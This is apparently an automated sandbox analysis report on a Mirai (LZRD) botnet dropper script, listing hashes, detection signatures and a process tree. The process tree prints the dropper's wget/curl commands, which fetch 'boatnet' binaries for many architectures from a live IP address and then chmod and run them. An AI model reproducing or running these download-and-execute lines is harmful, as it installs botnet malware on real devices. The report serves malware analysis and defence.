Overview

overview

10

Static

static

1

ohshit.sh

ubuntu-18.04-amd64

10

ohshit.sh

debian-9-armhf

10

ohshit.sh

debian-9-mips

10

ohshit.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    148s
  • max time network
    149s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20240611-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20240611-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    12-01-2025 14:35

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ohshit.sh

  • Size

    2KB

  • MD5

    e25f891adc7a50ef0de34587b5d59e24

  • SHA1

    90118fabbbb484f6d7e3d94d5128cac84ca384d5

  • SHA256

    cb69d62b52dd6917dbde67db70d37db577ea3fa002bb6f9fd6d88354f84a5a57

  • SHA512

    cdd371403ebe19b4fc4a57fe5f48cf967f3baa2b11c8ab6abc69734c631209d8a1c45f17053d2f07e8fd5efe0f17420d661261b820fb07b01f820761270d13e0

Score
10/10
mirailzrdbotnetdefense_evasiondiscoveryupx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • File and Directory Permissions Modification 1 TTPs 15 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 15 IoCs
  • Modifies Watchdog functionality 1 TTPs 30 IoCs

    Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

    defense_evasion
  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Writes file to system bin folder 30 IoCs
  • UPX packed file 1 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

    discovery
  • System Network Configuration Discovery 1 TTPs 2 IoCs

    Adversaries may gather information about the network configuration of a system.

    discovery
  • Writes file to tmp directory 30 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/ohshit.sh
    /tmp/ohshit.sh
    1⤵
    • Writes file to tmp directory
    PID:1512
    • /usr/bin/wget
      wget http://94.158.245.27/hiddenbin/boatnet.x86
      2⤵
      • Writes file to tmp directory
      PID:1513
    • /usr/bin/curl
      curl -O http://94.158.245.27/hiddenbin/boatnet.x86
      2⤵
      • Writes file to tmp directory
      PID:1517
    • /bin/cat
      cat boatnet.x86
      2⤵
        PID:1518
      • /bin/chmod
        chmod +x boatnet.x86 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
        2⤵
        • File and Directory Permissions Modification
        PID:1519
      • /tmp/WTF
        ./WTF
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Writes file to system bin folder
        • Reads runtime system information
        PID:1520
      • /usr/bin/wget
        wget http://94.158.245.27/hiddenbin/boatnet.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1524
      • /usr/bin/curl
        curl -O http://94.158.245.27/hiddenbin/boatnet.mips
        2⤵
        • System Network Configuration Discovery
        • Writes file to tmp directory
        PID:1525
      • /bin/chmod
        chmod +x boatnet.mips boatnet.x86 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-knnn3u systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
        2⤵
        • File and Directory Permissions Modification
        PID:1527
      • /tmp/WTF
        ./WTF
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Writes file to system bin folder
        • Reads runtime system information
        PID:1528
      • /usr/bin/wget
        wget http://94.158.245.27/hiddenbin/boatnet.arc
        2⤵
        • Writes file to tmp directory
        PID:1532
      • /usr/bin/curl
        curl -O http://94.158.245.27/hiddenbin/boatnet.arc
        2⤵
        • Writes file to tmp directory
        PID:1533
      • /bin/chmod
        chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-GJYZhK systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
        2⤵
        • File and Directory Permissions Modification
        PID:1541
      • /tmp/WTF
        ./WTF
        2⤵
        • Executes dropped EXE
        • Modifies Watchdog functionality
        • Writes file to system bin folder
        • Reads runtime system information
        PID:1542
      • /usr/bin/wget
        wget http://94.158.245.27/hiddenbin/boatnet.i468
        2⤵
          PID:1546
        • /usr/bin/curl
          curl -O http://94.158.245.27/hiddenbin/boatnet.i468
          2⤵
          • Writes file to tmp directory
          PID:1547
        • /bin/chmod
          chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-GJYZhK systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
          2⤵
          • File and Directory Permissions Modification
          PID:1549
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1550
        • /usr/bin/wget
          wget http://94.158.245.27/hiddenbin/boatnet.i686
          2⤵
          • Writes file to tmp directory
          PID:1554
        • /usr/bin/curl
          curl -O http://94.158.245.27/hiddenbin/boatnet.i686
          2⤵
          • Writes file to tmp directory
          PID:1561
        • /bin/chmod
          chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-biJf8d systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
          2⤵
          • File and Directory Permissions Modification
          PID:1563
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1564
        • /usr/bin/wget
          wget http://94.158.245.27/hiddenbin/boatnet.x86_64
          2⤵
          • Writes file to tmp directory
          PID:1568
        • /usr/bin/curl
          curl -O http://94.158.245.27/hiddenbin/boatnet.x86_64
          2⤵
          • Writes file to tmp directory
          PID:1569
        • /bin/chmod
          chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-phqvhA systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
          2⤵
          • File and Directory Permissions Modification
          PID:1595
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1596
        • /usr/bin/wget
          wget http://94.158.245.27/hiddenbin/boatnet.mpsl
          2⤵
          • Writes file to tmp directory
          PID:1600
        • /usr/bin/curl
          curl -O http://94.158.245.27/hiddenbin/boatnet.mpsl
          2⤵
          • Writes file to tmp directory
          PID:1607
        • /bin/chmod
          chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-8qhydC systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
          2⤵
          • File and Directory Permissions Modification
          PID:1609
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1610
        • /usr/bin/wget
          wget http://94.158.245.27/hiddenbin/boatnet.arm
          2⤵
          • Writes file to tmp directory
          PID:1614
        • /usr/bin/curl
          curl -O http://94.158.245.27/hiddenbin/boatnet.arm
          2⤵
          • Writes file to tmp directory
          PID:1615
        • /bin/chmod
          chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-8qhydC systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
          2⤵
          • File and Directory Permissions Modification
          PID:1617
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1618
        • /usr/bin/wget
          wget http://94.158.245.27/hiddenbin/boatnet.arm5
          2⤵
          • Writes file to tmp directory
          PID:1622
        • /usr/bin/curl
          curl -O http://94.158.245.27/hiddenbin/boatnet.arm5
          2⤵
          • Writes file to tmp directory
          PID:1623
        • /bin/chmod
          chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
          2⤵
          • File and Directory Permissions Modification
          PID:1633
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1634
        • /usr/bin/wget
          wget http://94.158.245.27/hiddenbin/boatnet.arm6
          2⤵
          • Writes file to tmp directory
          PID:1638
        • /usr/bin/curl
          curl -O http://94.158.245.27/hiddenbin/boatnet.arm6
          2⤵
          • Writes file to tmp directory
          PID:1643
        • /bin/chmod
          chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-SbxxeJ systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
          2⤵
          • File and Directory Permissions Modification
          PID:1645
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1646
        • /usr/bin/wget
          wget http://94.158.245.27/hiddenbin/boatnet.arm7
          2⤵
          • Writes file to tmp directory
          PID:1650
        • /usr/bin/curl
          curl -O http://94.158.245.27/hiddenbin/boatnet.arm7
          2⤵
          • Writes file to tmp directory
          PID:1651
        • /bin/chmod
          chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-bolt.service-rhVjAA systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
          2⤵
          • File and Directory Permissions Modification
          PID:1659
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1660
        • /usr/bin/wget
          wget http://94.158.245.27/hiddenbin/boatnet.ppc
          2⤵
          • Writes file to tmp directory
          PID:1664
        • /usr/bin/curl
          curl -O http://94.158.245.27/hiddenbin/boatnet.ppc
          2⤵
          • Writes file to tmp directory
          PID:1667
        • /bin/chmod
          chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
          2⤵
          • File and Directory Permissions Modification
          PID:1669
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1670
        • /usr/bin/wget
          wget http://94.158.245.27/hiddenbin/boatnet.spc
          2⤵
          • Writes file to tmp directory
          PID:1674
        • /usr/bin/curl
          curl -O http://94.158.245.27/hiddenbin/boatnet.spc
          2⤵
          • Writes file to tmp directory
          PID:1675
        • /bin/chmod
          chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa systemd-private-d3b82350ea324328903a7208792362c3-systemd-timedated.service-ieu9t1 WTF
          2⤵
          • File and Directory Permissions Modification
          PID:1677
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1678
        • /usr/bin/wget
          wget http://94.158.245.27/hiddenbin/boatnet.m68k
          2⤵
          • Writes file to tmp directory
          PID:1682
        • /usr/bin/curl
          curl -O http://94.158.245.27/hiddenbin/boatnet.m68k
          2⤵
          • Writes file to tmp directory
          PID:1683
        • /bin/chmod
          chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa WTF
          2⤵
          • File and Directory Permissions Modification
          PID:1687
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1688
        • /usr/bin/wget
          wget http://94.158.245.27/hiddenbin/boatnet.sh4
          2⤵
          • Writes file to tmp directory
          PID:1692
        • /usr/bin/curl
          curl -O http://94.158.245.27/hiddenbin/boatnet.sh4
          2⤵
          • Writes file to tmp directory
          PID:1693
        • /bin/chmod
          chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 config-err-8JBWpx netplan_uuqr82fq ohshit.sh snap-private-tmp ssh-aWIWPa7JoOzN systemd-private-d3b82350ea324328903a7208792362c3-colord.service-2OyRbA systemd-private-d3b82350ea324328903a7208792362c3-ModemManager.service-kDXuTV systemd-private-d3b82350ea324328903a7208792362c3-systemd-resolved.service-YofTFa WTF
          2⤵
          • File and Directory Permissions Modification
          PID:1695
        • /tmp/WTF
          ./WTF
          2⤵
          • Executes dropped EXE
          • Modifies Watchdog functionality
          • Writes file to system bin folder
          • Reads runtime system information
          PID:1696

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • /tmp/boatnet.x86
        Filesize

        29KB

        MD5

        545dbe1d228295c958b5a3f6ec4d8278

        SHA1

        f8dff366ea07681be596cdb33911c3f4119d0763

        SHA256

        a8cbba23e7c866ccf3dc8b4d4e1cc5a51de83272cb6f8df8746a51a2817d8f7b

        SHA512

        fe2115ad64b5755a4b4d71660d8de94c0a7f3f7d9eb3519a6e82216621f83d0855a32c41963b22dabac02e9d82c95cca8efce568d2fdafd8123e4f443c335a3f

        Download Submit